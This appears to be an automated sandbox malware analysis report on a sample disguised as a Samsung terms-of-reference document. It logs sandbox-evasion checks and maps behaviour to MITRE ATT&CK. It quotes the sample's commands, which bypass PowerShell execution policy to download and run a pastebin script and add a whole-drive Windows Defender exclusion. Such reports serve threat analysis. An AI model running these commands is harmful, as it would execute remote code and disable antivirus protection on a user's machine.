Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeMemory allocated: 25772100000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeWindow / User API: threadDelayed 3403Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeWindow / User API: threadDelayed 457Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7900Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1739Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7560Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2169Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3202
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6444
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.dllJump to dropped file
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeAPI coverage: 0.0 %
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe TID: 4464Thread sleep count: 51 > 30Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe TID: 4464Thread sleep count: 3403 > 30Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe TID: 4464Thread sleep count: 457 > 30Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe TID: 2472Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128Thread sleep count: 7900 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108Thread sleep count: 1739 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 7560 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7192Thread sleep count: 2169 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep time: -12912720851596678s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep count: 3202 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep count: 6444 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2386070213.0000029809673000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2591390743.00000298096B4000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162133220.0000029809671000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2592055488.000002980973B000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.3041372249.000002980973B000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2890720432.0000029809682000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.3040911001.00000298096A3000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2386719702.00000298096B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
Source: powershell.exe, 00000004.00000002.2194411243.000001F7694B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 7FF8B2743843Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"Jump to behavior
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeCode function: 0_2_00007FF6A7F903BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF6A7F903BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2386070213.0000029809673000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2591390743.00000298096B4000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2592513695.00000298097D9000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2591390743.00000298097CD000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3162133220.0000029809671000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.2890720432.0000029809682000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.3040911001.00000298096A3000.00000004.00000020.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000003.3136813783.00000298096C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
Windows Management Instrumentation		1
DLL Side-Loading		111
Process Injection		1
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		2
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization Scripts1
DLL Side-Loading		11
Disable or Modify Tools		LSASS Memory1
Query Registry		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)131
Virtualization/Sandbox Evasion		Security Account Manager121
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets131
Virtualization/Sandbox Evasion		SSHKeylogging14
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
System Network Configuration Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
